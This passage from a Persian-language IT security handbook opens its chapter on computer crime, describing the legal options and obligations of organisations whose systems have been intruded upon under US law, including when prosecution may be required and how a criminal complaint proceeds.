‫‪ o‬ﺑﺘﻮﺍﻧﺪ ﺩﺭﺑﺎﺭﺓ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺑﺤﺚ ﻛﻨﺪ ﻭ‬
‫ﺍﮔﺮ ﺩﺭ ﺑﺤﺚ ﻣﻮﻓﻖ ﺷـﺪ ﻗـﺎﺩﺭ ﺑﺎﺷـﺪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ‬
‫ﺣﺬﻑ‪ ،‬ﺍﺻﻼﺡ ﻭ ﻳﺎ ﺗﻜﻤﻴﻞ ﻧﻤﺎﻳﺪ‪.‬‬
‫‪١٧٩‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﭘﺮﺩﺍﺧﺖ‪ ١٣٠.‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺩﺳﺘﺮﺳـﻲ ﺟﻬـﺎﻧﻲ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ‪ ،‬ﻭﺟـﻮﺩ‬
‫ﻗـﻮﺍﻧﻴﻨﻲ ﻛـﻪ ﺍﺯ ﺩﺍﺧــﻞ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻧــﺸﺄﺕ ﻧﮕﺮﻓﺘـﻪﺍﻧــﺪ ﺭﺍ‬
‫ﺿﺮﻭﺭﻱ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻓﺼﻞ ﻧﻬﻢ‬
‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﮔﺰﻳﻨﻪﻫﺎﻱ ﺣﻘﻮﻗﻲ ﻣﻮﺟﻮﺩ ﺩﺭ ﭘﻲ ﻭﻗﻮﻉ ﻳﻚ ﻧﻔﻮﺫ‬
‫ﺍﮔﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﻤﺎ ﺩﺭ ﺍﺛﺮ ﻧﻔﻮﺫ ﺩﭼﺎﺭ ﺁﺳﻴﺐ ﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺩﺭ ﺳﻴﺴﺘﻢ ﺣﻘﻮﻗﻲ ﻭ ﻗﺎﻧﻮﻧﻲ ﻛﺸﻮﺭ ﻣﺤﻞ ﺍﻗﺎﻣﺘﺘﺎﻥ ﮔﺰﻳﻨـﻪﻫـﺎﻱ‬
‫ﻣﺘﻌﺪﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ‬
‫ﻓﺼﻞ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﺍﺳﺘﻔﺎﺩﺓ ﺩﻗﻴﻖ ﺍﺯ ﺟﻨﺒﻪﻫﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﻗﺎﻧﻮﻥ ﻳﺎﺭﻱ ﻛﻨـﺪ‪ ،‬ﭼﺮﺍﻛـﻪ ﺩﺭ ﻗـﻮﺍﻧﻴﻦ ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺣﻘـﻮﻗﻲ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺗﻔﺎﻭﺗﻬﺎﻱ ﺯﻳـﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻟـﺬﺍ ﺩﺭ ﺍﻳـﻦ‬
‫ﻓﺼﻞ ﺑـﻪ ﭼﻴـﺰﻱ ﻓﺮﺍﺗـﺮ ﺍﺯ ﻗـﻮﺍﻧﻴﻦ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻧﺨـﻮﺍﻫﻴﻢ‬
‫ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﭼﺎﺭﻩﺍﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻣﻠـﺰﻡ ﺑـﻪ‬
‫ﻼ‪:‬‬
‫ﺍﻧﺠﺎﻡ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺑﺎﺷﻴﺪ‪ .‬ﻣﺜ ﹰ‬
‫•‬
‫ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺮﺍﻱ ﺷﺮﻛﺖ ﺑﻴﻤﻪ ﺍﺩﻋﺎﻧﺎﻣﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ‬
‫ﺗﺎ ﺧﺴﺎﺭﺗﻲ ﻛﻪ ﺩﺭ ﺍﺛﺮ ﻳﻚ ﻧﻔـﻮﺫ ﺑـﻪ ﺷـﻤﺎ ﻭﺍﺭﺩ ﺷـﺪﻩ ﺭﺍ‬
‫ﺟﺒﺮﺍﻥ ﻛﻨﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺟﺎﻧﺐ ﺷﺮﻛﺖ ﺑﻴﻤﻪ ﻣﻠﺰﻡ ﺑﻪ‬
‫ﺍﻧﺠﺎﻡ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﻋﻠﻴﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺷﻮﻳﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﺧﺎﺹ ﻭ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺷـﺪﻩﺍﻱ ﺭﺍ ﭘـﺮﺩﺍﺯﺵ‬
‫ﻣﻲﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻗﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ ﺷـﻤﺎ ﺭﺍ ﻣﻠـﺰﻡ ﺑـﻪ‬
‫ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﻭ ﺍﺭﺍﺋـﻪ ﮔـﺰﺍﺭﺵ ﺩﺭ ﻣـﻮﺭﺩ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ‬
‫ﻣﺸﻜﻮﻙ ﻛﻨﻨﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺍﺯ ﻳﻚ ﻓﻌﺎﻟﻴﺖ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺁﮔﺎﻩ ﺷﻮﻳﺪ ﻭ ﺁﻧﺮﺍ ﮔـﺰﺍﺭﺵ‬
‫ﻧﻜﻨﻴﺪ ﺍﺯ ﻧﻈﺮ ﻗﺎﻧﻮﻥ ﺑﻌﻨﻮﺍﻥ "ﻣﻌﺎﻭﻧﺖ ﺩﺭ ﺟﺮﻡ" ﻣـﺴﺌﻮﻟﻴﺖ‬
‫ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ‪ ،‬ﺑﺨﺼﻮﺹ ﺍﮔـﺮ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﻫـﻢ ﺩﺭ ﺁﻥ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺍﺯ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻛﺎﺭﻫـﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ ﻭ‬
‫ﻧﺎﺩﺭﺳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ ﻭ ﺷﻤﺎ ﺩﺭ ﻗﺒﺎﻝ ﺁﻥ ﻛـﺎﺭﻱ ﻧﻜﻨﻴـﺪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺧﺎﻃﺮ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﻋﻠﻴـﻪ ﺷـﻤﺎ‬
‫ﺷﻜﺎﻳﺖ ﻛﻴﻔﺮﻱ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﻣﺪﻳﺮ ﺍﺟﺮﺍﻳﻲ ﻳﻚ ﺷﺮﻛﺖ ﺩﻭﻟﺘـﻲ ﺑﺎﺷـﻴﺪ ﻭ ﺗـﺼﻤﻴﻢ‬
‫ﺑﮕﻴﺮﻳﺪ ﻛـﻪ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ ﺭﺍ ﺗﺤـﺖ ﭘﻴﮕـﺮﺩ ﻭ‬
‫ﺗﺠﺴﺲ ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ‪ ،‬ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺷﺮﻛﺖ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻋﻠﻴﻪ ﺷﻤﺎ ﺍﻗﺎﻣﺔ ﺩﻋﻮﻱ ﻛﻨﻨﺪ‪.‬‬
‫‪ ١٣٠‬ﻳﻚ ﻣﺒﺎﺣﺜﺔ ﮔﺴﺘﺮﺩﻩﺗﺮ ﺩﺭ ﻣﻮﺭﺩ ﻣﺒﺎﺣﺚ ﺣﻘﻮﻗﻲ ﻭ ﻗـﺎﻧﻮﻧﻲ ﺩﺭ ﺍﻳـﺎﻻﺕ‬
‫ﻣﺘﺤﺪﻩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻛﺘﺎﺏ "ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ" ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩ‪:‬‬
‫)‪A Crimefighter's Handbook (O'Reilly‬‬
‫ﻣﺎ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ ﭼﻨﺎﻧﭽﻪ ﺩﺭ ﻣﻮﺭﺩ ﻣﻄﺎﻟﺒﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺁﻧﻬـﺎ‬
‫ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﻴﻢ ﺑﻪ ﺗﻮﺿﻴﺤﺎﺕ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺑﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ‬
‫ﻛﻨﻴﺪ‪ .‬ﻛﺘﺎﺏ ﻓﻮﻕ ﺩﻳﮕﺮ ﺑﻪ ﭼﺎﭖ ﻧﻤﻲﺭﺳﺪ‪ ،‬ﻭﻟﻲ ﻛﭙﻲﻫﺎ ﻭ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﻗﺪﻳﻤﻲ ﺁﻥ ﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺍﻣﻴﺪﻭﺍﺭﻳﻢ ﻫﻴﭽﻮﻗﺖ ﻣﺠﺒﻮﺭ ﻧﺸﻮﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟـﻮﺩ‬
‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﻋﻤﻞ ﻛﻨﻴﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍ ﺑﺎ ﻛﻮﺷـﺶ‬
‫ﻓﺮﺍﻭﺍﻥ ﻣﻄﺎﻟﻌﻪ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﻭ ﻫﻤﺔ ﮔﺎﻣﻬﺎﻱ ﻣﻬﻢ ﺩﺭ ﺟﻬﺖ ﺣﻔﻆ‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺮﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺗﻤـﺎﻡ ﺍﻳـﻦ ﺍﺣـﻮﺍﻝ‬
‫ﻫﻤﭽﻨﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﻼ ﻛﺎﺭﻣﻨﺪ ﺷﻤﺎ ﺑﻮﺩﻩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ‬
‫ﺑﮕﻴﺮﺩ‪ .‬ﺷﺎﻳﺪ ﻓﺮﺩﻱ ﻛﻪ ﻗﺒ ﹰ‬
‫ﺣﺴﺎﺏ ﻗﺪﻳﻤﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﻧﻔـﻮﺫ ﻭ ﺑﻌـﻀﻲ ﺍﺯ ﺳـﻮﺍﺑﻖ ﺭﺍ ﺣـﺬﻑ‬
‫ﻛﻨﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺗﻤﺎﻡ ﺗﻼﺷﻬﺎﻱ ﺷﻤﺎ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﻋﻤﻠﻴـﺎﺕ‬
‫ﻧﻔﻮﺫ‪ ،‬ﺷﺎﻳﺪ ﻓﺮﺩﻱ ﺍﺯ ﻳﻚ ﻛﺸﻮﺭ ﺧﺎﺭﺟﻲ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷـﻤﺎ‬
‫ﻭﺍﺭﺩ ﺷﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﺷﺮﺍﻳﻂ ﺷﻤﺎ ﭼﻪ ﻣﺪﺭﻛﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺑﻪ ﺩﺍﺩﮔﺎﻩ‬
‫ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷـﺖ؟ ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﻣـﻲﺗـﻮﺍﻥ ﭘﺮﺳـﻴﺪ‬
‫ﻫﻨﮕﺎﻣﻲ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﺓ ﻋﺎﺩﻱ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﭼﻪ ﺧﻄﺮﺍﺗـﻲ ﺍﺯ‬
‫ﺟﺎﻧﺐ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺴﺘﻢ ﺣﻘﻮﻗﻲ ﺷﻤﺎ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨﻨـﺪ؟ ﺍﮔـﺮ‬
‫ﻫﺪﻑ ﻳﻚ ﺷﻜﺎﻳﺖ ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ ﭼﻪ ﻣﻲﻛﻨﻴﺪ؟ ﺍﻳﻦ ﻓﺼﻞ‬
‫ﺗﻼﺵ ﺩﺍﺭﺩ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺭﺍ ﺭﻭﺷﻦ ﻛﻨـﺪ‪ .‬ﺑـﻪ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ‬
‫ﻓﺼﻞ ﺑﻴﺎﻥ ﺷﺪﻩ ﺻﺮﻓﹰﺎ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻛﻠﻲ ﺗﻮﺟﻪ ﻛـﺮﺩ‬
‫ﻭ ﻧﻪ ﻣﺴﺎﺋﻞ ﻗﺎﻧﻮﻧﻲ ﻭ ﺣﻘﻮﻗﻲ؛ ﭼﺮﺍﻛﻪ ﺑـﺮﺍﻱ ﺟﺰﺋﻴـﺎﺕ ﺑﻴـﺸﺘﺮ ﻭ‬
‫ﻣﺴﺎﺋﻞ ﺭﻳﺰﺗﺮ ﺑﺎﻳﺪ ﺍﺯ ﻭﻛﻼﻱ ﺧﻮﺏ ﻭ ﻣﺸﺎﻭﺭﺍﻥ ﺣﻘﻮﻗﻲ ﻣﺠـﺮﺏ‬
‫ﺑﺨﻮﺍﻫﻴـﺪ ﺑـﺮ ﺣــﺴﺐ ﻗـﻮﺍﻧﻴﻦ ﻛـﺸﻮﺭ ﻣﺤــﻞ ﺍﻗﺎﻣﺘﺘـﺎﻥ ﺷــﻤﺎ ﺭﺍ‬
‫ﺭﺍﻫﻨﻤﺎﻳﻲ ﻛﻨﻨﺪ‪.‬‬
‫ﻗﺒﻞ ﺍﺯ ﻫﺮﮔﻮﻧﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﺁﻏﺎﺯ ﻣﺮﺍﺣﻞ ﻗﺎﻧﻮﻧﻲ ﺑـﺎ ﻳـﻚ ﻭﻛﻴـﻞ‬
‫ﺯﺑﺪﻩ ﻣﺸﻮﺭﺕ ﻛﻨﻴﺪ‪ .‬ﭼﻮﻥ ﺩﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻫـﺎﻱ ﻗـﺎﻧﻮﻧﻲ‬
‫ﺧﻄﺮﺍﺕ ﻭ ﻣﺸﻜﻼﺗﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺑﺎﻳـﺪ ﻗﺒـﻞ ﺍﺯ ﺷـﺮﻭﻉ ﭘﻴﮕـﺮﺩ‬
‫ﻗﺎﻧﻮﻧﻲ ﻧﺴﺒﺖ ﺑﻪ ﺍﻧﺠﺎﻡ ﺁﻥ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ‪.‬‬
‫‪١٨٠‬‬
‫•‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﮔﺮ ﻣﺪﻳﺮ ﺍﺟﺮﺍﻳﻲ ﻳﻚ ﺷﺮﻛﺖ ﺧـﺼﻮﺻﻲ ﺑﺎﺷـﻴﺪ‪ ،‬ﺣﺘـﻲ‬
‫ﺍﮔﺮ ﺷـﺮﻛﺖ ﻓﺎﻗـﺪ ﺳـﻬﺎﻣﺪﺍﺭ ﻫـﻢ ﺑﺎﺷـﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ‪ ،‬ﺣﺎﻣﻴﺎﻥ ﻭ ﻳـﺎ ﻣـﺸﺘﺮﻳﺎﻥ ‪ -‬ﺑـﺴﺘﻪ ﺑـﻪ‬
‫ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫـﺮ ﻛـﺸﻮﺭ ‪ -‬ﺍﺯ ﺷـﻤﺎ ﺷـﻜﺎﻳﺖ‬
‫ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻭ ﻣﻲﺩﺍﻧﻴﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﻪ‬
‫ﺷﺪﺕ ﺩﺭ ﻣﻌﺮﺽ ﻣﺨﺎﻃﺮﻩ ﻗﺮﺍﺭﺩﺍﺭﺩ ﻗﺎﻋﺪﺗﹰﺎ ﺑﺎﻳﺪ ﺑﻌﻨـﻮﺍﻥ ﺑﺨـﺸﻲ‬
‫ﺍﺯ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺍﻣﻨﻴﺘـﻲ )ﻗﺒـﻞ ﺍﺯ ﻭﻗـﻮﻉ ﺭﺧـﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ( ﺑـﺎ ﻣـﺸﺎﻭﺭ‬
‫ﺣﻘﻮﻗﻲ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﮔﻔﺘﮕﻮ ﻛﻨﻴﺪ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺴﺘﻪ ﺑﻪ ﺩﺧﺎﻟﺖ ﻳـﺎ‬
‫ﻋﺪﻡ ﺩﺧﺎﻟﺖ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﺭﺍ ﺍﺗﺨـﺎﺫ‬
‫ﻣﻲ ﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺗﻤﺮﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺯﻣﺎﻥ ﺑﺤﺮﺍﻥ‪ ،‬ﺍﺣﺘﻤﺎﻝ ﺩﻧﺒﺎﻝﺷﺪﻥ‬
‫ﻭﺍﻗﻌﻲ ﺳﻴﺎﺳﺘﻬﺎ ﻫﻨﮕﺎﻣﻲ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴﺎﺯ ﺍﺳﺖ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﻴﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﭼﻨﺪ ﻣﻘﺪﻣﻪ ﺑﺮﺍﻱ ﺷﺮﻭﻉ ﺑﺤﺚ‪ ،‬ﺍﻳﻦ ﻗﺴﻤﺖ ﻣـﺮﻭﺭﻱ ﺑـﺮ‬
‫ﭼﻨﺪ ﻣﺴﺌﻠﻪ ‪ -‬ﻛﻪ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﻗﻮﻱ ﺷﻤﺎ ﻧﻴﺰ ﺭﻭﺯﻱ ﺑﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ‬
‫ﻣﻲﺷﻮﻳﺪ ‪ -‬ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪:‬‬
‫ﺗﻨﻈﻴﻢ ﺷﻜﻮﺍﺋﻴﻪ ﺟﺰﺍﻳﻲ‬
‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺍﺣـﺴﺎﺱ ﻛﻨﻴـﺪ ﻛـﺴﻲ ﺧـﻼﻑ‬
‫ﻗﺎﻧﻮﻥ ﻋﻤﻞﻛﺮﺩﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻋﻠﻴﻪ ﺍﻭ ﺍﻗﺪﺍﻡ ﻗﺎﻧﻮﻧﻲ ﻧﻤﺎﻳﻴﺪ ﻭ ﺍﻳـﻦ‬
‫ﺭﻭﻧﺪ ﺑـﺎ ﺗﻨﻈـﻴﻢ ﺷـﻜﻮﺍﺋﻴﻪ ﻗـﻀﺎﻳﻲ ﺩﺭ ﻣﺮﺍﺟـﻊ ﺭﺳـﻤﻲ ﺷـﺮﻭﻉ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺳﭙﺲ ﺍﺯ ﺩﺍﺩﻳﺎﺭ ﺍﺟﺎﺯﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷـﻮﺩ ﻛـﻪ ﺑـﺮ ﺍﺳـﺎﺱ‬
‫ﺍﺩﻋﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺗﺤﻘﻴﻖ ﺑﻌﻤﻞ ﺁﻳﺪ ﻭ ﺍﮔﺮ ﺟﺮﻣﻲ ﺗﺸﺨﻴﺺ ﺩﺍﺩﻩ‬
‫ﺷﺪ ﺑﺮ ﺍﺳﺎﺱ ﺁﻥ ﻳﻚ ﺩﺍﺩﺧﻮﺍﺳﺖ ﺗﻨﻈﻴﻢ ﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﺑﺮﺧﻲ ﻭ ﺷﺎﻳﺪ ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ‪ ،‬ﺗﺤﻘﻴﻘﺎﺕ ﺟﻨﺎﻳﻲ ﻧﺘﻴﺠـﻪﺍﻱ ﺑـﺮﺍﻱ‬
‫ﺷﻤﺎ ﺩﺭ ﭘﻲ ﻧﺪﺍﺭﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺍﻋﻤﺎﻝ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺗﻜـﺮﺍﺭ‬
‫ﻧﺸﻮﺩ ﻭ ﻧﻔﻮﺫﮔﺮ ﺭﺩﭘﺎﻳﻲ ﺍﺯ ﺧﻮﺩ ﺑـﺎﻗﻲ ﻧﮕﺬﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ ،‬ﻳـﺎ ﺍﮔـﺮ‬
‫ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺍﺯ ﻳﻚ ﻛﺸﻮﺭ ﺧـﺎﺭﺟﻲ ﻣـﻮﺭﺩ ﺣﻤﻠـﻪ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪ‬
‫ﺑﺎﺷﺪ‪ ،‬ﺑﺴﻴﺎﺭ ﺑﻌﻴﺪ ﺍﺳـﺖ ﻛـﻪ ﺑﺘﻮﺍﻧﻴـﺪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ‬
‫ﺩﺳﺘﮕﻴﺮ ﻛﻨﻴﺪ‪ .‬ﻧﻔﻮﺫﮔﺮﺍﻥ ﺣﺮﻓﻪﺍﻱ ﺑﻨﺪﺭﺕ ﺍﺯ ﺧﻮﺩ ﺭﺩ ﭘﺎﻳﻲ ﺑـﺎﻗﻲ‬
‫‪١٣١‬‬
‫ﻣﻲﮔﺬﺍﺭﻧﺪ‪.‬‬
‫ﺗﻨﻈﻴﻢ ﻭ ﺍﺭﺍﺋﻪ ﺷﻜﻮﺍﺋﻴﻪ ﻟﺰﻭﻣﹰﺎ ﺑﻪ ﺗﻌﻘﻴﺐ ﻗﻀﺎﻳﻲ ﻣﻨﺠﺮ ﻧﻤﻲﺷﻮﺩ‪.‬‬
‫ﺩﺍﺩﻳﺎﺭ ﻣﺮﺑﻮﻃﻪ )ﺩﺭ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﻛﺸﻮﺭﻱ‪ ،‬ﺍﻳﺎﻟﺘﻲ ﻳﺎ ﻣﺤﻠﻲ( ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﻗــﺎﻧﻮﻥ ﻧﻘــﺾ ﺷــﺪﻩ‪ ،‬ﺷــﺪﺕ ﺟــﺮﻡ‪ ،‬ﻟــﺰﻭﻡ ﻫﻤﻜــﺎﺭﻱ ﺑﺎﺯﺭﺳــﺎﻥ‬
‫ﺁﻣﻮﺯﺵﺩﻳﺪﻩ ﻭ ﻧﻮﻉ ﻣﺤﻜﻮﻣﻴﺖ ﺗـﺼﻤﻴﻢ ﻣـﻲﮔﻴـﺮﺩ‪ .‬ﺑـﻪ ﺧـﺎﻃﺮ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺳﺘﮕﺎﻩ ﻗﻀﺎﻳﻲ ﻣﻤﻠﻮ ﺍﺯ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﮔﻮﻧـﺎﮔﻮﻥ‬
‫ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺩﺭ ﭘﺮﻭﻧـﺪﻩﻫـﺎﻱ ﺟﺪﻳـﺪ‬
‫ﺩﺭﺻﻮﺭﺗﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺟﺮﺍﺋﻢ ﺧﺎﺹ ﻭ ﻳـﺎ‬
‫ﻼ ﺍﺣﺘﻤــﺎﻝ ﺍﻧﺠــﺎﻡ ﺗﺤﻘﻴﻘــﺎﺕ ﺩﺭ‬
‫ﺗﻬﺪﻳــﺪﺍﺕ ﺟــﺪﻱ ﺑﺎﺷــﻨﺪ‪ .‬ﻣــﺜ ﹰ‬
‫ﭘﺮﻭﻧﺪﻩﺍﻱ ﻛﻪ ﺩﺭ ﺁﻥ ‪ ۲۰۰،۰۰۰‬ﺩﻻﺭ ﺩﺍﺩﻩ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘـﻪ‪ ،‬ﺍﺯ ﻳـﻚ‬
